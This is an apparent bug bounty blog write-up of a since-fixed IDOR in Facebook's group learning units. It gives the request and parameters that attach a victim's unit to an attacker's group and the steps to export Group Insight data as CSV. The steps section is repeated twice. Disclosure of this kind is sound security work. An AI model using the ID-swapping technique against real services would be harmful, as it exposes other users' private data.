Disclose the Facebook Learning Unit Group Insight
There is an IDOR issue in a feature called learning unit which lead to disclose the Group Insight. If the targeted group privacy is public, then attacker can disclose the group insight without become a member and for closed/secret group privacy, attacker need to become a member.
Steps :
1. Request
POST /groups/learning/edit_units_dialog/submit/
.....
group_id=Attacker_Group&description=&unit_ids[0]=Victim_Unit_ID
Response :
for (;;);{"__ar":1,"payload":null,"jsmods":{"require":[["ServerRedirect","reloadPage",[],[]]]},...
Victim unit should appear in attacker group.
2. Attacker go to his group > group insight and request a download to download the group insight data (.csv format) and wait until notification from facebook that his data is ready to be download.
3. From the browser, open a new tab and go to https://www.facebook.com/groups/Attacker_group_ID/completions_export/
4. The .csv file including victim unit details its being downloaded and attacker can see the victim unit details by opening the file.
Impact :
Attacker can read the "Group Insight" data.
Video :
Timeline :
18 Aug 2018 : Send Report to Facebook
23 Aug 2018 : Triaged
1 Sept 2018 : Fix Confirmed
1 Sept 2018 : Bounty $1500
Steps :
1. Request
POST /groups/learning/edit_units_dialog/submit/
.....
group_id=Attacker_Group&description=&unit_ids[0]=Victim_Unit_ID
Response :
for (;;);{"__ar":1,"payload":null,"jsmods":{"require":[["ServerRedirect","reloadPage",[],[]]]},...
Victim unit should appear in attacker group.
2. Attacker go to his group > group insight and request a download to download the group insight data (.csv format) and wait until notification from facebook that his data is ready to be download.
3. From the browser, open a new tab and go to https://www.facebook.com/groups/Attacker_group_ID/completions_export/
4. The .csv file including victim unit details its being downloaded and attacker can see the victim unit details by opening the file.
Impact :
Attacker can read the "Group Insight" data.
Video :
Timeline :
18 Aug 2018 : Send Report to Facebook
23 Aug 2018 : Triaged
1 Sept 2018 : Fix Confirmed
1 Sept 2018 : Bounty $1500
Good one bro. Did you check workplace for this issue? or it was not vulnerable?
ReplyDelete